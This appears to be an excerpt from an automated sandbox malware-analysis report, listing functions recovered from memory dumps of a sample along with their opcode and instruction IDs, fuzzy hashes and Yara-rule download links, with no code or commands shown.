                                                        • Opcode ID: bacaf575658dc46ff99fbf1adca071e29fcf249dc0e4963939e1360763c4de23
                                                        • Instruction ID: a584a2f0783ec37a2e9c3a46dfe01f0fa7f6af2d9349e6bf221b9ab4badb4b65
                                                        • Opcode Fuzzy Hash: bacaf575658dc46ff99fbf1adca071e29fcf249dc0e4963939e1360763c4de23
                                                        • Instruction Fuzzy Hash: 7341F7B4D2526ADFCB44DFA8E4848EDBBB0FB4E300F029459E816B7290DB349910CF54
                                                        Function 0718729C Relevance: .1, Instructions: 103COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a980338b4cb08310dde41fe829abd15b8b6155ed0cc09da60f6731bfe0988151
                                                        • Instruction ID: 9a28032495a6823a85850ee380c33af01a20f8b817e44430757a7fa8b915d262
                                                        • Opcode Fuzzy Hash: a980338b4cb08310dde41fe829abd15b8b6155ed0cc09da60f6731bfe0988151
                                                        • Instruction Fuzzy Hash: BB3137A17102654BCB9D7B7C586867F6997EFD4350B60043DEA06CB3C1DE28CD0287A6
                                                        Function 071872D4 Relevance: .1, Instructions: 100COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6e6e4c981eb4351639e2f84c497026f55381fd8b95aae2ee7703c28d7a0cc68c
                                                        • Instruction ID: 5063d2895d908d8ed14c4752182c259de270fff92286206b592b40ff49243f97
                                                        • Opcode Fuzzy Hash: 6e6e4c981eb4351639e2f84c497026f55381fd8b95aae2ee7703c28d7a0cc68c
                                                        • Instruction Fuzzy Hash: BE314BB1910209AFCF54EFA9D884A9EBFF9EF48320F10842AE515E7351D735A940CFA5
                                                        Function 07183518 Relevance: .1, Instructions: 98COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 119fb1d43963598a827b65d904275fed0536ab53b481346b685923db6685ecba
                                                        • Instruction ID: 01220bdfdead83c2818236b78dfeee62285af56ebc7602b1ff83750764786e5f
                                                        • Opcode Fuzzy Hash: 119fb1d43963598a827b65d904275fed0536ab53b481346b685923db6685ecba
                                                        • Instruction Fuzzy Hash: 83316D75A002098FCB05DFA4D984AEE7BF6EF49304F1580A9E905AB3A2DB35ED05CF50
                                                        Function 071872AC Relevance: .1, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4e717d2b84d6fced78481e91f16b2d9acf3d5c10485886e76bebd0dfa25bb3ac
                                                        • Instruction ID: 39cc1087f8fdbc795de52d89b11b1473fbf56d11321e17e967a02e8ef7eca590
                                                        • Opcode Fuzzy Hash: 4e717d2b84d6fced78481e91f16b2d9acf3d5c10485886e76bebd0dfa25bb3ac
                                                        • Instruction Fuzzy Hash: EA2105B2A14249AFDB46FBA8CC4596D7FB5DF42310B5884AAE504D72D2EF309D018B52
                                                        Function 00FCD4C4 Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1684799854.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_fcd000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a5550f2f777d2088e04277a308b5538be7378e19c2a88f803a5426e7fa9c2f8d
                                                        • Instruction ID: afbc77d01c6272931b48c9568aa3fb668b945fcbffef549cdc46e8bd2295e204
                                                        • Opcode Fuzzy Hash: a5550f2f777d2088e04277a308b5538be7378e19c2a88f803a5426e7fa9c2f8d
                                                        • Instruction Fuzzy Hash: 4D213872504201DFCB05DF14DAC1F2ABF65FB84328F24C97DD9090B256C336D806E6A1
                                                        Function 07183170 Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6608f969c506f57ac4d828e440ea0c3dd1849dda465bc94dd677b8724a488042
                                                        • Instruction ID: 8f7e74aca1e34cd23fbaed226c384a780124b70961fcbee59b99f0de5559ccc1
                                                        • Opcode Fuzzy Hash: 6608f969c506f57ac4d828e440ea0c3dd1849dda465bc94dd677b8724a488042
                                                        • Instruction Fuzzy Hash: A32159B5A007159FC320DF69D8809BBBBF9FF89710B05856DE819DB320E770A945CBA1
                                                        Function 00FDD01C Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1684846502.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_fdd000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 91e8ac2c151c1e644b80f96c202502d55812551908bcd6b15d3ee29b14fd2f38
                                                        • Instruction ID: 84b4413ac96e2b61c6c3fa153fc326ef7ad69287f85ea28b91d0bf19d94c7981
                                                        • Opcode Fuzzy Hash: 91e8ac2c151c1e644b80f96c202502d55812551908bcd6b15d3ee29b14fd2f38
                                                        • Instruction Fuzzy Hash: 9221F5B5504200DFCB14DF14D9C8B26BB66FBC4324F28C56ED90A4B35AC336D847EA61
                                                        Function 00FDD1D4 Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1684846502.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_fdd000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 692d1a88d2cd36d564cdd8f6190d01542b076e65e90a1aab9069c438798f4d25
                                                        • Instruction ID: d6b2eb7fe3f9d7cde838f1a1e484ac2e219cfd636c91004e755bddec3eb4fb85
                                                        • Opcode Fuzzy Hash: 692d1a88d2cd36d564cdd8f6190d01542b076e65e90a1aab9069c438798f4d25
                                                        • Instruction Fuzzy Hash: 512129B1904204EFDB05DF14D9C0F26BB66FB84324F28C56EE9494B351C336D846EB61
                                                        Function 07186B8F Relevance: .1, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1573456e4149ec91896b7f82b0c09c88ade933d4942cca1e00b262c1c15542e0
                                                        • Instruction ID: 533483aaa42ee61887c4dbc402a5f21b234e54ad79df102ffe3fd53a7b37d6e7
                                                        • Opcode Fuzzy Hash: 1573456e4149ec91896b7f82b0c09c88ade933d4942cca1e00b262c1c15542e0
                                                        • Instruction Fuzzy Hash: 9831E0B0C11218DFDB20DF99C588B8EBFF4EB48314F24801AE408BB291C7B56845CFA5
                                                        Function 07183CA4 Relevance: .1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 15818311cdf531718a2cccf54325e1239a9bb48d5409b26fd37c028943def3e9
                                                        • Instruction ID: 204863cc7c987915a95916e132889ec596276bdc06e81935e98d4fdbb4ce7c61
                                                        • Opcode Fuzzy Hash: 15818311cdf531718a2cccf54325e1239a9bb48d5409b26fd37c028943def3e9
                                                        • Instruction Fuzzy Hash: 0431EEB0C21218DFDB60DF99C588B9EBBF4EB08314F24805AE408BB281C7B56844CFA1
                                                        Function 07183180 Relevance: .1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 77aa6baf3d650043b875c00c1675a08a1db63d43a07c2bfd0d1a0b9ed32f1f7d
                                                        • Instruction ID: 0207c94d4a68f80b78b97994969cea73cfe4b24ab5ea9a41001e7a2119146b12
                                                        • Opcode Fuzzy Hash: 77aa6baf3d650043b875c00c1675a08a1db63d43a07c2bfd0d1a0b9ed32f1f7d
                                                        • Instruction Fuzzy Hash: 79216AB56107159BC324DF69C8809BBB7FAFF88710B01892DE9199B320E770ED45CBA0
                                                        Function 07186FEB Relevance: .1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 650b2eefcaa462055d59899db4c34e90f7a0246f367f1d103bfe1390a17ebf20
                                                        • Instruction ID: c19622258a0c5e6d50a44bca20a31566c85451e31c464d4e41d244cf955e06ff
                                                        • Opcode Fuzzy Hash: 650b2eefcaa462055d59899db4c34e90f7a0246f367f1d103bfe1390a17ebf20
                                                        • Instruction Fuzzy Hash: 6821A4B1A001159FDB55DF5AC454BABBBF5EB88364F148169F414D72D1C7748904CB90
                                                        Function 07181430 Relevance: .1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 20418031aca33f57ea32ccdf665caed7d75b45172e7b4c49983adb63dce29183
                                                        • Instruction ID: 997f9ca808ca6d3002fc95b6895f8f0ec4d97fa9fc646470aaf95034a77c7536
                                                        • Opcode Fuzzy Hash: 20418031aca33f57ea32ccdf665caed7d75b45172e7b4c49983adb63dce29183
                                                        • Instruction Fuzzy Hash: E8110BB3700B9967D319962A9C0092BBFDBEBCA35170DC46FE449C7250DB7098029791
                                                        Function 071869D8 Relevance: .1, Instructions: 64COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 808e6dfd8d168589c2bff4d027dc3b264d7fd164b576ad44a2385e69b995f6c4
                                                        • Instruction ID: b5269a1a4b14f800a87334f888a2c3c527e4837339cd45c7f078f4bf66451851
                                                        • Opcode Fuzzy Hash: 808e6dfd8d168589c2bff4d027dc3b264d7fd164b576ad44a2385e69b995f6c4
                                                        • Instruction Fuzzy Hash: AC11B6B2A007069F9B56EB798C404BFB7BAEBC46507148529D424D7381EF30D9069B51
                                                        Function 00FDD005 Relevance: .1, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1684846502.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_fdd000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d81716faa0653b77d6bd8d8b753b7ad010a235b93bdbe131c658c89d0c493411
                                                        • Instruction ID: 793e128f9339c9b6519ea444d32c923b0aad21bf21900d45896f4d3ee353d892
                                                        • Opcode Fuzzy Hash: d81716faa0653b77d6bd8d8b753b7ad010a235b93bdbe131c658c89d0c493411
                                                        • Instruction Fuzzy Hash: 312183755093808FC712CF24D594715BF72EB46314F28C5EBD8498B6A7C33A980ACB62
                                                        Function 07184D70 Relevance: .1, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b8d04bcd2aed424814993212fba5e84362bb5f1a023450c1633862d4ecdefe46
                                                        • Instruction ID: 7fc82c7086b871b57fe72b08a2177852ca53e0af4b686eba9d42345fb14bc02f
                                                        • Opcode Fuzzy Hash: b8d04bcd2aed424814993212fba5e84362bb5f1a023450c1633862d4ecdefe46
                                                        • Instruction Fuzzy Hash: B821B5B5A10A18DFC744DF5AE684999BBF1FF8C310B6280D4E5489B365DB71DE20EB00
                                                        Function 0718BC68 Relevance: .1, Instructions: 59COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7e30d0fe2f5c2aa585fdf428c0fd8f12b0051059d45108fd7a89381181dc5135
                                                        • Instruction ID: 64ab7ae5f3e0a48b99746294e6171b4cde1c4302ab1fdc93008bb271eb7fad9d
                                                        • Opcode Fuzzy Hash: 7e30d0fe2f5c2aa585fdf428c0fd8f12b0051059d45108fd7a89381181dc5135
                                                        • Instruction Fuzzy Hash: C321D8F8D18209DFCB94DF99C181AAEBBF5BF49300F619159D809A7351D7309A40CF51
                                                        Function 071872E4 Relevance: .1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fe336a7778cbdac4bc9b60d2469c4da2dab0efe6656871214dd596bf59c74eed
                                                        • Instruction ID: bf5ab3ec5dc41a23fefe545c2de2cf4739eb8abdc43b09e4145ad8a4b656c8c6
                                                        • Opcode Fuzzy Hash: fe336a7778cbdac4bc9b60d2469c4da2dab0efe6656871214dd596bf59c74eed
                                                        • Instruction Fuzzy Hash: B82100B59102499FCB60DF9AC984ADEBBF5FB48320F50841AE919B7210C379A944CFA1
                                                        Function 00FCD4BF Relevance: .1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1684799854.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_fcd000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                        • Instruction ID: cdcdf329f4588ca0ad7183804b51137ff40acc6c3a9318d61a76427a6220ef63
                                                        • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                        • Instruction Fuzzy Hash: 5211B476904240CFCB15CF14D6C4B1ABF71FB94328F28C5ADD8494B656C336D45ADB91
                                                        Function 0718C1F0 Relevance: .1, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 374c28726822939177f4e63d653e9947b97b44b6ba9750ee3209c4f7c1559384
                                                        • Instruction ID: 0245252d3fcfcfc3d1be0ee89ebaa017b6a63c0ba089b4c97c611776df0a938c
                                                        • Opcode Fuzzy Hash: 374c28726822939177f4e63d653e9947b97b44b6ba9750ee3209c4f7c1559384
                                                        • Instruction Fuzzy Hash: D911E9B1D146188BEB58DFA7D8446AEFEFBAFCD300F14C569980966264DB7009468EA0
                                                        Function 07188C61 Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5bbedbc6f3d7a3b73243160945a0fe5a9c60caefc111a3e7e94152b90150a06a
                                                        • Instruction ID: df350d39c09f10aa33e40011ad52fcbab1fe42ead1c6ee93b28c96165bdcc8cc
                                                        • Opcode Fuzzy Hash: 5bbedbc6f3d7a3b73243160945a0fe5a9c60caefc111a3e7e94152b90150a06a
                                                        • Instruction Fuzzy Hash: 3F110270AA1704CFD3559F28C846BA17FB2AF46310F9980A4D1418F2B6D732E802CF01
                                                        Function 00FDD1CF Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1684846502.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_fdd000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                        • Instruction ID: 6bdcdabb44a2f370d54028dff974e43a9f25dde16ebf12af973a9907bf29960f
                                                        • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                        • Instruction Fuzzy Hash: 26118B75904280DFDB16CF14D9C4B15BBB2FB84324F28C6AAD8494B796C33AD84ADB61
                                                        Function 07188540 Relevance: .1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c3a0d02be85a54b98614b05ba045f83dae589f0fcc576e6106002457aae3f1a7
                                                        • Instruction ID: 94aa3a68393f4dcbd3dbf9b6ea466af9159f0aa2a26ab8db1ba677e0a422c21e
                                                        • Opcode Fuzzy Hash: c3a0d02be85a54b98614b05ba045f83dae589f0fcc576e6106002457aae3f1a7
                                                        • Instruction Fuzzy Hash: 4BF044F23102129BD7A3751D8C8056F2B6E8FD11607A8032AEC05C32D1EF10CC024AB3
                                                        Function 071841CF Relevance: .0, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9ae1ebfab5e0407312d4d8f206e62fbff197c6a02baffd16b2afc0ec2dac92ad
                                                        • Instruction ID: 5ac977628689c93ea1953c660400037a7189f14ea68bb7edfd8e2502613b5999
                                                        • Opcode Fuzzy Hash: 9ae1ebfab5e0407312d4d8f206e62fbff197c6a02baffd16b2afc0ec2dac92ad
                                                        • Instruction Fuzzy Hash: 52012D713082828FC782BF3CA8446967FE3DBEA201F05457AEA46C76A5DF319C068781
                                                        Function 0718BD20 Relevance: .0, Instructions: 48COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3c4879c228a25f64d95f3cdc901a3aabdb8700ed5130e2220f95b780cee02539
                                                        • Instruction ID: 061e8a9cbd4090d2f8cb4e2223354d1d64dd57c00b7a93504b45b920a5407d1e
                                                        • Opcode Fuzzy Hash: 3c4879c228a25f64d95f3cdc901a3aabdb8700ed5130e2220f95b780cee02539
                                                        • Instruction Fuzzy Hash: 9A1127F0D08208EFCB58EFA9C580AAEBBF9FB49304F11D6999418A7351D330DA408F80
                                                        Function 07188C78 Relevance: .0, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 56342b1733c09e644f9e0293a5bfa2ac6558e704f6fbb52e2d1574d25eae40c4
                                                        • Instruction ID: 81392d8aad73cec13a0f375b1ed35509910f6b95a49ac5cbdd514b50e5b09703
                                                        • Opcode Fuzzy Hash: 56342b1733c09e644f9e0293a5bfa2ac6558e704f6fbb52e2d1574d25eae40c4
                                                        • Instruction Fuzzy Hash: E50180706693458FE3459F28C845B523BA1AF86300F9A80E6E115CF2F6CB21DC01CB02
                                                        Function 00FCD759 Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1684799854.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_fcd000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9c0e9d132b2e8471d054a9d0338911af7edebabaebaad8db683027618b5e9277
                                                        • Instruction ID: 995b6ec6bbd428bb3a30233e5788fdc1119945a2f13f14f059d29f1c2f8145da
                                                        • Opcode Fuzzy Hash: 9c0e9d132b2e8471d054a9d0338911af7edebabaebaad8db683027618b5e9277
                                                        • Instruction Fuzzy Hash: AD012B724053019AE7145B29CEC0F2AFFE8DF51334F18C52EED094A286C7399840E6B1
                                                        Function 071807C0 Relevance: .0, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 86c5b15672cf012a6ce167b992974895e52e71aace619b31db991b2710a5fc5c
                                                        • Instruction ID: d5f5bb5d0a2faf8fcd8eb53568a395f23be03ddb8fbd0532bd6c4b670e12f195
                                                        • Opcode Fuzzy Hash: 86c5b15672cf012a6ce167b992974895e52e71aace619b31db991b2710a5fc5c
                                                        • Instruction Fuzzy Hash: 6C01BC31A10318CBCB188A29E85549ABBB7FF8C321B00852EE50687390DF71A915CB80
                                                        Function 07186F4C Relevance: .0, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: db216d9c06ad89206bf772afad2e883382f7ac4a428b821d673628508fcfcf81
                                                        • Instruction ID: 224b1f223bbcb3560c5fba3899ce8f9feb8cd8eea7b1dceb613706c97b4ba80e
                                                        • Opcode Fuzzy Hash: db216d9c06ad89206bf772afad2e883382f7ac4a428b821d673628508fcfcf81
                                                        • Instruction Fuzzy Hash: 6E016DB180021ADFDB65EF59C5587AEBBF4FF48364F108529E8149A2A1D7748984CFD0
                                                        Function 0718D120 Relevance: .0, Instructions: 41COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b79ba8a26ac1d6d76bcc46edf542d8c39e23020daf4074cce255bb349604d98a
                                                        • Instruction ID: f7116df476d37af2992325504ea3a6324cd0f86fbc621d6e9865890cc643492c
                                                        • Opcode Fuzzy Hash: b79ba8a26ac1d6d76bcc46edf542d8c39e23020daf4074cce255bb349604d98a
                                                        • Instruction Fuzzy Hash: 0601ACB4A14208EFC744EFA9D645AADBBF9AF4D300F16D094A4499B2A5DB319E40DF40
                                                        Function 071841E0 Relevance: .0, Instructions: 41COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ac65bc3c47d233849d362f18967cdf93554837a25b40b3074ce66ffa8975bcee
                                                        • Instruction ID: b588c8da2a9b939da1f12aeedcb1a16725c2d09cea142a9599e9d188efe0e921
                                                        • Opcode Fuzzy Hash: ac65bc3c47d233849d362f18967cdf93554837a25b40b3074ce66ffa8975bcee
                                                        • Instruction Fuzzy Hash: A301F4713041018FCB85AA38E94469A37E7EBD9241F018439FA0ACB395DF309C428780
                                                        Function 0718D0A8 Relevance: .0, Instructions: 39COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 51ea2fcc25c492108b3cd6d3c2031069da66bcc7dd5dad0ef7b1f45c29e69c78
                                                        • Instruction ID: 1497bab5e9d3e80008d53c93d376567df9d4c309766b81813956794b0ea7da85
                                                        • Opcode Fuzzy Hash: 51ea2fcc25c492108b3cd6d3c2031069da66bcc7dd5dad0ef7b1f45c29e69c78
                                                        • Instruction Fuzzy Hash: 7DF0A4B0A1C308DBC748EF65E5409BCBBBCAF4E300F11D1A494585B2D1D7308A42DF40
                                                        Function 0718DF18 Relevance: .0, Instructions: 37COMMON
                                                        Download Yara Rule
